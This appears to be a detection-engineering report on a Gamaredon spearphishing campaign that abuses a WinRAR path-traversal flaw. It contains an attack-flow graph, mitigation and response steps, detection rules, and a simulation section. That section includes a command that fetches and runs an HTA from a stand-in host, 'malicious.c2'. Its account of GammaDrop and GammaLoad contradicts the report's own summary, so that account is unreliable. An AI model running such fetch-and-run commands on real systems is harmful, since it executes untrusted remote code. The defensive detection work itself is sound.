Gamaredon Uses Spoofed Emails, GammaDrop, and GammaLoad
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report outlines a Gamaredon campaign that abuses CVE-2025-8088 to deliver VBScript payloads through weaponized RAR archives attached to spearphishing emails aimed at Ukrainian state organizations. Once opened, the malicious archive drops a GammaDrop downloader, which retrieves a GammaLoad HTA beacon responsible for persistence and communication with Cloudflare-proxied command-and-control infrastructure. The activity has been ongoing since September 2025 and continues to evolve through changes in delivery techniques and infrastructure.
Investigation
Researchers analyzed email headers, archive contents, and the embedded VBScript and HTA payloads, uncovering exploitation of a WinRAR path traversal flaw, use of NTFS alternate data streams, and dynamic generation of command-and-control URLs. Their investigation also identified multiple Cloudflare Workers domains, fast-flux DNS patterns, and DDNS services tied to the attacker’s infrastructure.
Mitigation
Organizations should enforce strict DMARC policies, block the 194.58.66.0/24 subnet, and monitor for suspicious RAR5 archives that create alternate data streams in the Startup folder. Defenders should also detect the specific user-agent patterns used by the GammaLoad beacon. Restricting or disabling execution of mshta.exe and limiting access to Wscript.Shell can further reduce the risk of payload execution.
Response
If this activity is detected, isolate the affected endpoint, preserve the malicious RAR archive and VBScript files, remove infected files from the Startup folder, delete the related RunOnce registry entry, and block the identified command-and-control domains and IP addresses. Security teams should then perform forensic analysis to determine the scope of compromise and rotate credentials for any impacted email accounts.
Attack Flow
graph TB
    %% Class Definitions
    classDef action fill:#99ccff
    classDef tool fill:#cccccc
    classDef file fill:#ffcc99
    classDef persistence fill:#ccffcc
    classDef process fill:#ff99cc

    %% Nodes – Actions (Techniques)
    action_email_spoofing["<b>Action</b> – <b>T1672 Email Spoofing</b><br/><b>Description</b>: Stolen government email credentials are used to authenticate to legitimate mail relays and send spoofed spearphishing messages appearing to originate from Ukrainian government entities."]
    class action_email_spoofing action
    action_spearphishing_attachment["<b>Action</b> – <b>T1566.001 Spearphishing Attachment</b><br/><b>Description</b>: The spoofed emails contain a RAR archive that exploits CVE-2025-8088 (WinRAR directory-traversal) to deliver a malicious payload."]
    class action_spearphishing_attachment action
    action_taint_shared_content["<b>Action</b> – <b>T1080 Taint Shared Content</b><br/><b>Description</b>: The archive uses a crafted ADS entry with a path-traversal sequence, causing WinRAR to write the VBScript payload into the Startup folder for persistence."]
    class action_taint_shared_content action
    action_masquerading_file_type["<b>Action</b> – <b>T1036.008 Masquerading File Type</b><br/><b>Description</b>: A decoy PDF file with random ASCII characters is presented to the user while the actual VBScript resides in an alternate data stream."]
    class action_masquerading_file_type action
    action_exploit_priv_esc["<b>Action</b> – <b>T1068 Exploitation for Privilege Escalation</b><br/><b>Description</b>: Exploiting CVE-2025-8088 grants code execution and allows writing to privileged locations without user interaction."]
    class action_exploit_priv_esc action
    action_obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: GammaDrop and GammaLoad payloads are heavily obfuscated VBScript/HTA using random variable names, junk functions, and string-building techniques."]
    class action_obfuscation action
    action_embedded_payloads["<b>Action</b> – <b>T1027.009 Embedded Payloads</b><br/><b>Description</b>: The second-stage HTA wraps the VBScript beacon and includes a Base64-encoded blob."]
    class action_embedded_payloads action
    action_deobfuscate["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/><b>Description</b>: The HTA decodes the Base64 blob to write an installer script to the TEMP folder and registers a RunOnce key."]
    class action_deobfuscate action
    action_web_c2["<b>Action</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/><b>Description</b>: The beacon communicates over HTTPS to Cloudflare Workers domains and falls back to a .ru domain, embedding victim identifiers in the User-Agent header."]
    class action_web_c2 action

    %% Nodes – Tools
    tool_winrar["<b>Tool</b> – <b>Name</b>: WinRAR<br/><b>Description</b>: Archive utility exploited via CVE-2025-8088 for directory-traversal and ADS write."]
    class tool_winrar tool

    %% Nodes – Files
    file_malicious_rar["<b>File</b> – <b>Name</b>: Malicious RAR archive<br/><b>Content</b>: Contains crafted ADS entry and decoy PDF."]
    class file_malicious_rar file
    file_ascad_payload["<b>File</b> – <b>Name</b>: VBScript payload in ADS<br/><b>Location</b>: Written to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"]
    class file_ascad_payload file
    file_decoy_pdf["<b>File</b> – <b>Name</b>: Decoy PDF<br/><b>Purpose</b>: Masquerades the malicious content to entice the user."]
    class file_decoy_pdf file
    file_hta_wrapper["<b>File</b> – <b>Name</b>: HTA wrapper<br/><b>Content</b>: Encodes VBScript beacon as Base64 blob."]
    class file_hta_wrapper file
    file_installer["<b>File</b> – <b>Name</b>: Installer script<br/><b>Location</b>: Written to %TEMP% by HTA."]
    class file_installer file

    %% Nodes – Persistence
    persistence_startup["<b>Persistence</b> – <b>Startup Folder</b><br/><b>Path</b>: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"]
    class persistence_startup persistence
    persistence_runonce["<b>Persistence</b> – <b>RunOnce Registry</b><br/><b>Location</b>: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"]
    class persistence_runonce persistence

    %% Nodes – C2
    c2_cloudflare["<b>C2</b> – Cloudflare Workers domain<br/><b>Protocol</b>: HTTPS"]
    class c2_cloudflare process
    c2_fallback_ru["<b>C2</b> – Fallback .ru domain<br/><b>Protocol</b>: HTTPS"]
    class c2_fallback_ru process

    %% Connections
    action_email_spoofing -->|sends| file_malicious_rar
    file_malicious_rar -->|exploits| tool_winrar
    tool_winrar -->|triggers| action_spearphishing_attachment
    action_spearphishing_attachment -->|uses| action_taint_shared_content
    action_taint_shared_content -->|writes to| file_ascad_payload
    file_ascad_payload -->|establishes| persistence_startup
    action_taint_shared_content -->|creates| file_decoy_pdf
    action_masquerading_file_type -->|presents| file_decoy_pdf
    action_masquerading_file_type -->|hides| file_ascad_payload
    action_spearphishing_attachment -->|enables| action_exploit_priv_esc
    action_exploit_priv_esc -->|facilitates| action_obfuscation
    action_obfuscation -->|produces| file_hta_wrapper
    file_hta_wrapper -->|contains| action_embedded_payloads
    action_embedded_payloads -->|encodes| action_deobfuscate
    action_deobfuscate -->|writes to| file_installer
    file_installer -->|registers| persistence_runonce
    action_deobfuscate -->|initiates| action_web_c2
    action_web_c2 -->|communicates with| c2_cloudflare
    action_web_c2 -->|fallback to| c2_fallback_ru
Detections
- Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
- LOLBAS WScript / CScript (via process_creation)
- Suspicious Binary / Scripts in Autostart Location (via file_event)
- Possible CVE-2025-8088 / CVE-2025-6218 (WinRAR Vulnerability) Exploitation Attempt (via file_event)
- Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
- Possible Cloudflare Development Domain Abuse (via dns)
- IOCs (HashSha256) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad Part 5
- IOCs (HashSha256) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad Part 4
- IOCs (HashSha256) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad Part 3
- IOCs (HashSha256) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad Part 2
- IOCs (HashSha256) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad Part 1
- IOCs (HashSha1) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad
- IOCs (SourceIP) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad
- IOCs (DestinationIP) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad
- Detection of GammaDrop and GammaLoad Execution [Windows Process Creation]
- Detection of GammaDrop VBScript and GammaLoad HTA Execution [Windows File Event]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
The adversary, having compromised a victim machine, downloads a malicious HTA payload (GammaDrop) from a C2-controlled server. The payload is intentionally obfuscated (T1027.009) and hosts a PowerShell dropper that later loads a second-stage DLL (GammaLoad) via wscript.exe. The attacker invokes the HTA with mshta.exe, causing Windows to interpret the HTA as a trusted HTML application; this exact process creation matches the detection rule. After the HTA runs, it drops a malicious JavaScript file and launches it through wscript.exe, completing the DLL injection (T1574.007) and process-doppelgänging (T1574.009).
Commands executed on the compromised host (simulated):
- Download malicious HTA: Invoke-WebRequest (simulated URL).
- Execute via mshta.exe: mshta.exe http://malicious.c2/gammadrop.hta
- Secondary execution with wscript.exe: wscript.exe //E:jscript //B c:\temp\gammaload.js
Regression Test Script:
<#
Simulated GammaDrop/GammaLoad execution to trigger the Sigma rule. This script:
 1. Writes a mock malicious HTA file to %TEMP%.
 2. Executes it with mshta.exe (produces the primary detection event).
 3. Writes a mock malicious JScript file and runs it with wscript.exe (produces the secondary detection event).
#>

# 1. Create a dummy HTA payload (representing GammaDrop)
$htaPath = "$env:TEMP\gammadrop.hta"
$htaContent = @"
<script language="VBScript">
MsgBox "Simulated GammaDrop executed"
</script>
"@
Set-Content -Path $htaPath -Value $htaContent -Encoding ASCII

# 2. Launch the HTA with mshta.exe (this should fire the detection)
#    -Wait blocks until the MsgBox is dismissed, so run this interactively.
Write-Host "[*] Executing GammaDrop via mshta.exe"
Start-Process -FilePath "mshta.exe" -ArgumentList "`"$htaPath`"" -Wait

# 3. Create a dummy JScript payload (representing GammaLoad)
$jsPath = "$env:TEMP\gammaload.js"
$jsContent = @"
// Simulated malicious script
WScript.Echo("GammaLoad simulated execution");
"@
Set-Content -Path $jsPath -Value $jsContent -Encoding ASCII

# 4. Run the script with wscript.exe (second detection event)
Write-Host "[*] Executing GammaLoad via wscript.exe"
Start-Process -FilePath "wscript.exe" -ArgumentList "//E:jscript //B `"$jsPath`"" -Wait

Write-Host "[+] Simulation complete."
Cleanup Commands:
# Remove temporary files created during the simulation
Remove-Item -Path "$env:TEMP\gammadrop.hta" -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMP\gammaload.js" -ErrorAction SilentlyContinue
Write-Host "[*] Cleanup finished."